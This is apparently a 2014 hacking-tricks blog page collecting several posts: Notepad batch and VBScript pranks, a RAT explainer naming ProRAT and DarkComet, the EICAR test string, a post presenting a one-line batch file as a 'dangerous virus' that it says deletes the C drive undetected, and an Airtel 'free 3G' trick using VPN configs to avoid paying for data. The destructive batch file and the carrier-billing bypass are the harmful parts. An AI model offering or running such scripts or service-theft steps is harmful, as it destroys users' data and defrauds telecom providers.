welcome to techmeniac,the best site for hacking tricks and secure tips..if u like this site please follow us on www.facebook.com/techmeniac,www.twitter.com/techmeniac.welcome to techmeniac,the best site for hacking tricks and secure tips..if u like this site please follow us on www.facebook.com/techmeniac,www.twitter.com/techmeniac

Sunday, 27 July 2014

5 Best Notepad Tricks that will Amaze you


Do you Think Notepad can be just used as Text Editor ? Do you Use notepad just to Save text and some other data? If Yes, Then you are missing out Some Cool and Interesting Notepad Tricks that you can Perform on your Computer.

Notepad Comes as an inbuilt app in all Versions of Windows. But Today i am Going to Share 5 Cool Notepad Tricks that you can Perform on your Computer because they are Harmless. The Below tricks that i am about to share will not harm your Computer in any way, Instead you will be Stunned to Learn something new that Notepad Can do for you.

5 Notepad Tricks that you can Perform now


Best Notepad Tricks 1) Matrix Effect:

We Have Seen alot of times in movies some kind of numbers in Green Color Flashing really fast. Ever Wondered How they do it ? 

Well, Today you will learn it. Basically its a Small Batch file that helps to do it. Just follow the Below simple steps to do it yourself.

Step 1: Open Notepad. 
Step 2:  Now Copy the Below Code.
@echo off

color 02

:start

echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%

goto start
Also Read: 5 Best Command Prompt tricks 

Step 3: Paste the Code in Notepad and Save it by Clicking on File and then Save.
Step 4: You will be now asked the file name and Save as Type, So name the file as Matrix.bat and Choose All files in save as type.
Step 5: Remember the Destination where you save the file. Now Navigate to the Location where you saved this file. Double Click on it to See the Magic.

2. Ghost Keyboard Typing:

This is a Technique by Which you can make Notepad type Automatically whatever you want. That means i will share a script which you will use to Display anything you want to and Notepad will automatically type it for you.
Step 1: Open Notepad
Step 2: Copy the Below code.

set wshshell = wscript.CreateObject("wScript.Shell")
wshshell.run "Notepad"
wscript.sleep 400
wshshell.sendkeys "v"
wscript.sleep 400
wshshell.sendkeys "i"
wscript.sleep 400
wshshell.sendkeys "s"
wscript.sleep 400
wshshell.sendkeys "i"
wscript.sleep 400
wshshell.sendkeys "t"
wscript.sleep 400
wshshell.sendkeys "u"
wscript.sleep 400
wshshell.sendkeys "s"
wscript.sleep 400
wshshell.sendkeys "a"
wscript.sleep 400
wshshell.sendkeys "t"
wscript.sleep 400
wshshell.sendkeys "T"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 120
wshshell.sendkeys "c"
wscript.sleep 200
wshshell.sendkeys "h"
wscript.sleep 100
wshshell.sendkeys "m"
wscript.sleep 140
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "n"
wscript.sleep 50
wshshell.sendkeys "i"
wscript.sleep 120
wshshell.sendkeys "a"
wscript.sleep 170
wshshell.sendkeys "c"
wscript.sleep 100
wshshell.sendkeys "."
wscript.sleep 120
wshshell.sendkeys "C"
wscript.sleep 160
wshshell.sendkeys "O"
wscript.sleep 200
wshshell.sendkeys "M"
wscript.sleep 100

Step 3: Paste the Code in Notepad and Save it.
Step 4: Name it techmeniac.vbs and Choose All files in Save as type.
Step 5: Double Click on the saved file to See this Live Notepad Trick

3. Make your Computer Speak:

In the Above trick we made notepad Type automatically but now we will our own text to Speech tool with the help of small script in Notepad. You will make your Computer Speak whatever you type. Excited ? Then follow the Below Simple Steps.
Step 1: Open Notepad
Step 2: Copy and Paste the Below Code in Notepad.
Dim message, sapi
message=InputBox("What do you want me to say?","Speak to Me")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak message 
Step 3: After Pasting the Above Code in Notepad, its time to Save the File. Save the File with name Speak.vbs and again choose All files in save as type

Step 4: Double Click on the File to See a pop up Window that looks something like this Picture

Now All you have to do is Type in Anything that you want it to Convert in Speech.

Then Click on Ok. Wait a second or Two and hear it do its work.

Also Check: How to Send Colorful Text Messages on Facebook

4. Keyboard LED lights Dancing Trick

This is another Fun Trick which will Make your Keyboard Lights ie: Numlock,Capslock and Scroll lock lights go dancing..

Step 1: Open notepad.

Step 2: Copy the Below Code and paste in it.

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop

Step 3: Save the File with the name Led.vbs and again choose all files.

Step 4: Double click the File to open, Look down at your keyboard to See the live performance.

How to Stop:

To Stop it just follow the Below Simple Steps.

  • Open Task manager by Pressing CTRL+ALT+DELETE
  • Now Goto Process Tab
  • Scroll down and search for wscript.exe and End the Process.

5. 9/11 Attack.


Do you know that World Trade Center Attact can be Seen in Notepad? If you are not aware of this trick then here is how to do it.
Step 1: First of all you will Open new notepad file.
Step 2: Type in Q33N
Step 3: Click on Format > Font> and Select font as "Wingdings" now Increase the font size to 72
You will be Amazed to See What notepad Displays you.

So with this It Concludes the list of 5 Best Notepad Tricks for 2014. If you enjoyed it then please care to Share it on Social media using the Below Buttons.

Wednesday, 16 July 2014

What is RAT Or Remote Access Trojan ?


remote access trojan or rat
RAT stands for Remote Access Trojan or Remote Administration Tool. It is one of the most dangerous virus out their over the internet. Hacker can use RAT to get complete control to your computer. He can do basically anything with your computer. Using RAT hacker can install keylogger and other malicious viruses remotely to your computer, infect files on your system and more. In this post i will tell you about what hacker can do with your computer using RAT and tell you about some commonly use RAT by hackers.

 What is RAT ?

As i have told you in my introduction paragraph RAT is Remote Access trojan. It is a peace of software or program which hacker uses to get complete control of your computer. It can be send to you in form of images, videos or any other files. Their are some RAT that even your antivirus software can not detect.  So always be sure about what you are downloading from the internet and never save or download files that anonymous user send you  over the mail or in chat room.

 What You Can do With RAT ?

Once a RAT is installed on any computer hacker can do almost anything with that computer. Some malicious task that you can do with RAT are listed below:
  • Infecting Files
  • Installing Keyloggers
  • Controlling Computer
  • Remotely start webcam, sounds, movies etc
  • Using your PC to attack Website (DDOS)
  • View Screen

 Harmless RAT or Good RAT

As you have seen how harmfull RAT are for your computer, but their are some good RAT which some of you might be using daily. You might have heard of TeamViewer, it is a software which you use to control some one's computer with his permission for file transfer, sharing your screen and more.

 Some Commonly Used RAT

  • ProRAT
  • CyberGate RAT
  • DarkComet RAT

More Hacking Tricks & Tips

Is you antivirus working perfect ?


               This trick will let you detect whether your antivirus software is working or is just a waste. We will create a file which every antivirus sofware will detect as virus but dont worry it is harmless and will not harm your computer.

  • First open Notepad and copy below code into it.
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
  •  Save the file as virus.exe
         As soon as you will run this file you antivirus will detect it as software. If not then you need to change your program.

Friday, 11 July 2014

Learn To Make Dangerous Virus In A Minute

computer virus
 In this post i will teach you to make simple yet very powerful or you can say dangerous computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.

What will this virus do ?  

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.

How to Make the virus ?

   1. Open Notepad and copy below code into it.
@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

Wednesday, 2 July 2014

Airtel Free Internet 3G Trick July 2014

Today after a long time, I am sharing one of the best and working Airtel 3G trick with you all guys. Airtel has one of the best internet services in India. The internet speed of Airtel GPRS in considerably better than other telecom companies. But, airtel internet plans are a bit costly. So, lot of people search for Airtel GPRS trick 2014 to use free GPRS on airtel. Well, here is an Airtel GPRS trick july 2014 which you can use to access free internet on Airtel.  Our team have found a new working host for Airtel. And this host is 100% working in all over India. It’s a new host trick working with VPN (Virtual Private Network) having proxy. This is one of the best Airtel Tricks in 2014 as it is working in all over India.
We have the team in every states of India, and they have checked this trick in their respective states. Working state names are given in the bottom of this post.

Airtel Free Internet 3G Trick July 2014:

airtel free internet Airtel Free Internet 3G Trick July 2014
You can use many apps like Facebook, Gmail, Whatsapp and can surf through Chrome as well as default browser in Mobile. In PC, you can use every software and browsing add-ons. Internet download manager is also supported with this airtel 3g trick.
You can Increase download speed in IDM by IDM Optimizer
This free airtel 3g trick is based on TCP Port 443 working 100% in a state where TCP 443 protocol is open. We have given the state names at the last where you can find the states where this protocol is open.

Requirements:

  1. Airtel SIM (3G enabled)
  2. No need of balance. This trick can be worked with 0 balances.
  3. Small 3G data pack required (This will help to prevent 3G speed capping)
  4. SPEED: Up to 500 KBps i.e. 7.2 Mbps
Must Check : SIMPLE WAY TO GET FREE RECHARGE ON ANDROID

Steps to Perform:


1) For PC Users:

This trick will work in PC. You just need to follow below steps to run it in to your computer.
  • First of all download the attachment file of Airtel 3g Config from Here.
  • Now download and install NMD VPN software in your computer
  • Download NMD VPN
    Features of NMD VPN:
    1. Freeware: zero cost for downloading and using it.
    2. Supports: All TCP and UDP port
    3. Requests: Supports all HTTP and HTTPS requests.
  • Now NMD VPN software is installed in your pc.
  • Go to the path (C:Program FilesNMDVPNconfig) and move your download config files here.
  • Now run NMD VPN Software (Remember: Windows 7 and Windows 8 users must have run this software as the Administrator otherwise this airtel 3g trick will not work)
  • Now just connect to the airtel internet with the default APN airtelgprs.com and then connect config and Enjoy Free unlimited 3g internet. (If you can’t be connected in first attempt, do try for 3-4 time. You will successfully connected)

2) For Mobile/Android Users:

This trick will work in android devices. You need to follow the below given simple steps to run it in to your android device.
Flying Twitter Bird Widget By Trickstoo.com Back to Top